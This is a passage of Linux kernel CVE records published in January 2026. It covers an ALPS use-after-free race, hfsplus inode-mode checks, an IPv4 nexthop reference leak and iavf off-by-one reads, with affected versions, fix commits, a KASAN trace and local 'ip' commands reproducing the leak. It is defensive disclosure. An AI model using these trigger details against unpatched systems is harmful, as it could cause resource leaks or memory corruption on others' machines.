"title": "scsi: Revert \"scsi: qla2xxx: Perform lockless command completion in abort path\"",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68818",
"datePublished": "2026-01-13T15:29:22.018Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:22.778Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68822 (GCVE-0-2025-68822)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
Input: alps - fix use-after-free bugs caused by dev3_register_work
Summary
In the Linux kernel, the following vulnerability has been resolved:
Input: alps - fix use-after-free bugs caused by dev3_register_work
The dev3_register_work delayed work item is initialized within
alps_reconnect() and scheduled upon receipt of the first bare
PS/2 packet from an external PS/2 device connected to the ALPS
touchpad. During device detachment, the original implementation
calls flush_workqueue() in psmouse_disconnect() to ensure
completion of dev3_register_work. However, the flush_workqueue()
in psmouse_disconnect() only blocks and waits for work items that
were already queued to the workqueue prior to its invocation. Any
work items submitted after flush_workqueue() is called are not
included in the set of tasks that the flush operation awaits.
This means that after flush_workqueue() has finished executing,
the dev3_register_work could still be scheduled. Although the
psmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),
the scheduling of dev3_register_work remains unaffected.
The race condition can occur as follows:
CPU 0 (cleanup path)     | CPU 1 (delayed work)
psmouse_disconnect()     |
  psmouse_set_state()    |
  flush_workqueue()      | alps_report_bare_ps2_packet()
  alps_disconnect()      | psmouse_queue_work()
  kfree(priv); // FREE   | alps_register_bare_ps2_mouse()
                         | priv = container_of(work...); // USE
                         | priv->dev3 // USE
Add disable_delayed_work_sync() in alps_disconnect() to ensure
that dev3_register_work is properly canceled and prevented from
executing after the alps_data structure has been deallocated.
This bug is identified by static analysis.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 04aae283ba6a8cd4851d937bf9c6d6ef0361d794 , < ed8c61b89be0c45f029228b2913d5cf7b5cda1a7 (git) |
| Linux | Linux | Affected: 04aae283ba6a8cd4851d937bf9c6d6ef0361d794 , < a9c115e017b2c633d25bdfe6709dda6fc36f08c2 (git) |
| Linux | Linux | Affected: 04aae283ba6a8cd4851d937bf9c6d6ef0361d794 , < bf40644ef8c8a288742fa45580897ed0e0289474 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/input/mouse/alps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ed8c61b89be0c45f029228b2913d5cf7b5cda1a7",
"status": "affected",
"version": "04aae283ba6a8cd4851d937bf9c6d6ef0361d794",
"versionType": "git"
},
{
"lessThan": "a9c115e017b2c633d25bdfe6709dda6fc36f08c2",
"status": "affected",
"version": "04aae283ba6a8cd4851d937bf9c6d6ef0361d794",
"versionType": "git"
},
{
"lessThan": "bf40644ef8c8a288742fa45580897ed0e0289474",
"status": "affected",
"version": "04aae283ba6a8cd4851d937bf9c6d6ef0361d794",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/input/mouse/alps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.0"
},
{
"lessThan": "4.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: alps - fix use-after-free bugs caused by dev3_register_work\n\nThe dev3_register_work delayed work item is initialized within\nalps_reconnect() and scheduled upon receipt of the first bare\nPS/2 packet from an external PS/2 device connected to the ALPS\ntouchpad. During device detachment, the original implementation\ncalls flush_workqueue() in psmouse_disconnect() to ensure\ncompletion of dev3_register_work. However, the flush_workqueue()\nin psmouse_disconnect() only blocks and waits for work items that\nwere already queued to the workqueue prior to its invocation. Any\nwork items submitted after flush_workqueue() is called are not\nincluded in the set of tasks that the flush operation awaits.\nThis means that after flush_workqueue() has finished executing,\nthe dev3_register_work could still be scheduled. Although the\npsmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),\nthe scheduling of dev3_register_work remains unaffected.\n\nThe race condition can occur as follows:\n\nCPU 0 (cleanup path) | CPU 1 (delayed work)\npsmouse_disconnect() |\n psmouse_set_state() |\n flush_workqueue() | alps_report_bare_ps2_packet()\n alps_disconnect() | psmouse_queue_work()\n kfree(priv); // FREE | alps_register_bare_ps2_mouse()\n | priv = container_of(work...); // USE\n | priv-\u003edev3 // USE\n\nAdd disable_delayed_work_sync() in alps_disconnect() to ensure\nthat dev3_register_work is properly canceled and prevented from\nexecuting after the alps_data structure has been deallocated.\n\nThis bug is identified by static analysis."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:24.703Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ed8c61b89be0c45f029228b2913d5cf7b5cda1a7"
},
{
"url": "https://git.kernel.org/stable/c/a9c115e017b2c633d25bdfe6709dda6fc36f08c2"
},
{
"url": "https://git.kernel.org/stable/c/bf40644ef8c8a288742fa45580897ed0e0289474"
}
],
"title": "Input: alps - fix use-after-free bugs caused by dev3_register_work",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68822",
"datePublished": "2026-01-13T15:29:24.703Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-13T15:29:24.703Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68767 (GCVE-0-2025-68767)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
hfsplus: Verify inode mode when loading from disk
Summary
In the Linux kernel, the following vulnerability has been resolved:
hfsplus: Verify inode mode when loading from disk
syzbot is reporting that S_IFMT bits of inode->i_mode can become bogus when
the S_IFMT bits of the 16bits "mode" field loaded from disk are corrupted.
According to [1], the permissions field was treated as reserved in Mac OS
8 and 9. According to [2], the reserved field was explicitly initialized
with 0, and that field must remain 0 as long as reserved. Therefore, when
the "mode" field is not 0 (i.e. no longer reserved), the file must be
S_IFDIR if dir == 1, and the file must be one of S_IFREG/S_IFLNK/S_IFCHR/
S_IFBLK/S_IFIFO/S_IFSOCK if dir == 0.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 6f768724aabd5b321c5b8f15acdca11e4781cf32 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d92333c7a35856e419500e7eed72dac1afa404a5 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 001f44982587ad462b3002ee40c75e8df67d597d (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 05ec9af3cc430683c97f76027e1c55ac6fd25c59 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < edfb2e602b5ba5ca6bf31cbac20b366efb72b156 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 91f114bffa36ce56d0e1f60a0a44fc09baaefc79 (git) |
| Linux | Linux | Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 005d4b0d33f6b4a23d382b7930f7a96b95b01f39 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6f768724aabd5b321c5b8f15acdca11e4781cf32",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d92333c7a35856e419500e7eed72dac1afa404a5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "001f44982587ad462b3002ee40c75e8df67d597d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "05ec9af3cc430683c97f76027e1c55ac6fd25c59",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "edfb2e602b5ba5ca6bf31cbac20b366efb72b156",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "91f114bffa36ce56d0e1f60a0a44fc09baaefc79",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "005d4b0d33f6b4a23d382b7930f7a96b95b01f39",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/hfsplus/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: Verify inode mode when loading from disk\n\nsyzbot is reporting that S_IFMT bits of inode-\u003ei_mode can become bogus when\nthe S_IFMT bits of the 16bits \"mode\" field loaded from disk are corrupted.\n\nAccording to [1], the permissions field was treated as reserved in Mac OS\n8 and 9. According to [2], the reserved field was explicitly initialized\nwith 0, and that field must remain 0 as long as reserved. Therefore, when\nthe \"mode\" field is not 0 (i.e. no longer reserved), the file must be\nS_IFDIR if dir == 1, and the file must be one of S_IFREG/S_IFLNK/S_IFCHR/\nS_IFBLK/S_IFIFO/S_IFSOCK if dir == 0."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:50.036Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6f768724aabd5b321c5b8f15acdca11e4781cf32"
},
{
"url": "https://git.kernel.org/stable/c/d92333c7a35856e419500e7eed72dac1afa404a5"
},
{
"url": "https://git.kernel.org/stable/c/001f44982587ad462b3002ee40c75e8df67d597d"
},
{
"url": "https://git.kernel.org/stable/c/05ec9af3cc430683c97f76027e1c55ac6fd25c59"
},
{
"url": "https://git.kernel.org/stable/c/edfb2e602b5ba5ca6bf31cbac20b366efb72b156"
},
{
"url": "https://git.kernel.org/stable/c/91f114bffa36ce56d0e1f60a0a44fc09baaefc79"
},
{
"url": "https://git.kernel.org/stable/c/005d4b0d33f6b4a23d382b7930f7a96b95b01f39"
}
],
"title": "hfsplus: Verify inode mode when loading from disk",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68767",
"datePublished": "2026-01-13T15:28:46.382Z",
"dateReserved": "2025-12-24T10:30:51.034Z",
"dateUpdated": "2026-01-19T12:18:50.036Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71097 (GCVE-0-2025-71097)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
ipv4: Fix reference count leak when using error routes with nexthop objects
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv4: Fix reference count leak when using error routes with nexthop objects
When a nexthop object is deleted, it is marked as dead and then
fib_table_flush() is called to flush all the routes that are using the
dead nexthop.
The current logic in fib_table_flush() is to only flush error routes
(e.g., blackhole) when it is called as part of network namespace
dismantle (i.e., with flush_all=true). Therefore, error routes are not
flushed when their nexthop object is deleted:
# ip link add name dummy1 up type dummy
# ip nexthop add id 1 dev dummy1
# ip route add 198.51.100.1/32 nhid 1
# ip route add blackhole 198.51.100.2/32 nhid 1
# ip nexthop del id 1
# ip route show
blackhole 198.51.100.2 nhid 1 dev dummy1
As such, they keep holding a reference on the nexthop object which in
turn holds a reference on the nexthop device, resulting in a reference
count leak:
# ip link del dev dummy1
[ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2
Fix by flushing error routes when their nexthop is marked as dead.
IPv6 does not suffer from this problem.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 5de7ad7e18356e39e8fbf7edd185a5faaf4f385a (git) |
| Linux | Linux | Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 33ff5c207c873215e54e6176624ed57423cb7dea (git) |
| Linux | Linux | Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 30386e090c49e803c0616a7147e43409c32a2b0e (git) |
| Linux | Linux | Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < 5979338c83012110ccd45cae6517591770bfe536 (git) |
| Linux | Linux | Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < ee4183501ea556dca31f5ffd8690aa9fd25b609f (git) |
| Linux | Linux | Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < e3fc381320d04e4a74311e576a86cac49a16fc43 (git) |
| Linux | Linux | Affected: 493ced1ac47c48bb86d9d4e8e87df8592be85a0e , < ac782f4e3bfcde145b8a7f8af31d9422d94d172a (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/fib_trie.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5de7ad7e18356e39e8fbf7edd185a5faaf4f385a",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "33ff5c207c873215e54e6176624ed57423cb7dea",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "30386e090c49e803c0616a7147e43409c32a2b0e",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "5979338c83012110ccd45cae6517591770bfe536",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "ee4183501ea556dca31f5ffd8690aa9fd25b609f",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "e3fc381320d04e4a74311e576a86cac49a16fc43",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
},
{
"lessThan": "ac782f4e3bfcde145b8a7f8af31d9422d94d172a",
"status": "affected",
"version": "493ced1ac47c48bb86d9d4e8e87df8592be85a0e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/fib_trie.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:58.253Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5de7ad7e18356e39e8fbf7edd185a5faaf4f385a"
},
{
"url": "https://git.kernel.org/stable/c/33ff5c207c873215e54e6176624ed57423cb7dea"
},
{
"url": "https://git.kernel.org/stable/c/30386e090c49e803c0616a7147e43409c32a2b0e"
},
{
"url": "https://git.kernel.org/stable/c/5979338c83012110ccd45cae6517591770bfe536"
},
{
"url": "https://git.kernel.org/stable/c/ee4183501ea556dca31f5ffd8690aa9fd25b609f"
},
{
"url": "https://git.kernel.org/stable/c/e3fc381320d04e4a74311e576a86cac49a16fc43"
},
{
"url": "https://git.kernel.org/stable/c/ac782f4e3bfcde145b8a7f8af31d9422d94d172a"
}
],
"title": "ipv4: Fix reference count leak when using error routes with nexthop objects",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71097",
"datePublished": "2026-01-13T15:34:56.814Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:58.253Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71087 (GCVE-0-2025-71087)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
iavf: fix off-by-one issues in iavf_config_rss_reg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
iavf: fix off-by-one issues in iavf_config_rss_reg()
There are off-by-one bugs when configuring RSS hash key and lookup
table, causing out-of-bounds reads to memory [1] and out-of-bounds
writes to device registers.
Before commit 43a3d9ba34c9 ("i40evf: Allow PF driver to configure RSS"),
the loop upper bounds were:
i <= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX
which is safe since the value is the last valid index.
That commit changed the bounds to:
i <= adapter->rss_{key,lut}_size / 4
where `rss_{key,lut}_size / 4` is the number of dwords, so the last
valid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `<=`
accesses one element past the end.
Fix the issues by using `<` instead of `<=`, ensuring we do not exceed
the bounds.
[1] KASAN splat about rss_key_size off-by-one
BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800
Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63
CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
Workqueue: iavf iavf_watchdog_task
Call Trace:
<TASK>
dump_stack_lvl+0x6f/0xb0
print_report+0x170/0x4f3
kasan_report+0xe1/0x1a0
iavf_config_rss+0x619/0x800
iavf_watchdog_task+0x2be7/0x3230
process_one_work+0x7fd/0x1420
worker_thread+0x4d1/0xd40
kthread+0x344/0x660
ret_from_fork+0x249/0x320
ret_from_fork_asm+0x1a/0x30
</TASK>
Allocated by task 63:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x7f/0x90
__kmalloc_noprof+0x246/0x6f0
iavf_watchdog_task+0x28fc/0x3230
process_one_work+0x7fd/0x1420
worker_thread+0x4d1/0xd40
kthread+0x344/0x660
ret_from_fork+0x249/0x320
ret_from_fork_asm+0x1a/0x30
The buggy address belongs to the object at ffff888102c50100
which belongs to the cache kmalloc-64 of size 64
The buggy address is located 0 bytes to the right of
allocated 52-byte region [ffff888102c50100, ffff888102c50134)
The buggy address belongs to the physical page:
page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50
flags: 0x200000000000000(node=0|zone=2)
page_type: f5(slab)
raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000
raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
>ffff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc
^
ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc
ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < ceb8459df28d22c225a82d74c0f725f2a935d194 (git) |
| Linux | Linux | Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 5bb18bfd505ca1affbca921462c350095a6c798c (git) |
| Linux | Linux | Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < d7369dc8dd7cbf5cee3a22610028d847b6f02982 (git) |
| Linux | Linux | Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 18de0e41d69d97fab10b91fecf10ae78a5e43232 (git) |
| Linux | Linux | Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < f36de3045d006e6d9be1be495f2ed88d1721e752 (git) |
| Linux | Linux | Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 3095228e1320371e143835d0cebeef1a8a754c66 (git) |
| Linux | Linux | Affected: 43a3d9ba34c9ca313573201d3f45de5ab3494cec , < 6daa2893f323981c7894c68440823326e93a7d61 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/iavf/iavf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ceb8459df28d22c225a82d74c0f725f2a935d194",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "5bb18bfd505ca1affbca921462c350095a6c798c",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "d7369dc8dd7cbf5cee3a22610028d847b6f02982",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "18de0e41d69d97fab10b91fecf10ae78a5e43232",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "f36de3045d006e6d9be1be495f2ed88d1721e752",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "3095228e1320371e143835d0cebeef1a8a754c66",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
},
{
"lessThan": "6daa2893f323981c7894c68440823326e93a7d61",
"status": "affected",
"version": "43a3d9ba34c9ca313573201d3f45de5ab3494cec",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/iavf/iavf_main.c"
],
